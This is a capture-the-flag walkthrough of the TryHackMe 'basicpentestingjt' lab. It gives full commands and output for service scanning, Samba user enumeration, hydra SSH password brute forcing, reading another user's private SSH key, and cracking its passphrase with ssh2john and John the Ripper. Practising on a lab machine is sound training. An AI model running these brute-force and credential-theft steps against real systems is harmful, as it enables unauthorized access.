TryHackMe CTF: basicpentestingjt (Easy)
URL: https://tryhackme.com/room/basicpentestingjt Easy
PHASE 1: Reconnaissance
Description of the room:
In these set of tasks you’ll learn the following:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.
Credits to Josiah Pierce from Vulnhub.
PHASE 2: Scanning & Enumeration
Running: nmap
Ran the following:
nmap -sC -sV xxx.xxx.xxx.xxx
Which produced the following output:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 23:17 EST
Nmap scan report for 10.10.183.192
Host is up (0.28s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8009/tcp open ajp13
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds
Also see: nmap.log
Enumerating Samba Users
Since Samba is running, we can run:
/usr/share/enum4linux/enum4linux.pl -a xxx.xxx.xxx.xxx
This resulted in the following log (truncated for space, key portions kept or full log):
=======================================================================
| Users on 10.10.145.91 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
From this, we know we have at least two users: jan, and kay.
Finding Web Server Folders
To attempt to find subfolders on the web server, GoBuster was used via:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://xxx.xxx.xxx.xxx/
This is what allowed us to find the /development folder:
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.183.192/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/17 23:22:47 Starting gobuster in directory enumeration mode
===============================================================
/development (Status: 301) [Size: 320] [--> http://10.10.183.192/development/]
Also see: gobuster.log
Attempting to guess jan SSH password
Using hydra, we try RockYou passwords over SSH with:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://xxx.xxx.xxx.xxx
Which resulted in:
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-17 23:30:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.183.192:22/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 14344231 to do in 1406:18h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
[STATUS] 109.29 tries/min, 765 tries in 00:07h, 14343636 to do in 2187:29h, 16 active
[22][ssh] host: 10.10.183.192 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-17 23:37:48
This is where we discovered the password: armando for user jan.
Also see: hydra.log
PHASE 3: Gaining Access
Privilege Escalation from jan to kay.
In the process of running Linpeas, we found that user jan had privilege to read user kay’s SSH private key. So, the key was retrieved via:
cat /home/kay/.ssh/id_rsa
When attempting to log into the server as Kay via:
ssh [email protected] -i ./kay_id_rsa
We are confronted with a password prompt. The SSH key is password protected.
Processing Kay’s Private SSH Key
We can take that private key:
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
(...snip...)
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----
We can put that into a format for “John the Ripper”, so that he can crack that password. We can do that by running the ssh2john.py script from here:
ssh2john.py ./kay_id_rsa > ./kay_id_rsa.hash
Resulting in the following hash of the private key file, suitable for John The Ripper to extract the key:
./kay_rsa_id:$sshng$1$16$6ABA7DE35C{...snip...}edb337116fa6e5ed858
We then run John the Ripper against it, using a word list:
john --wordlist=/usr/shared/wordlists/rockyou.txt ./kay_id_rsa.hash
We ultimately determine the password for the SSH key. So now, we can SSH into the server as kay with:
ssh [email protected] -i ./kay_id_rsa
Once logged in as user kay, we could read the pass.bak file which had the final flag.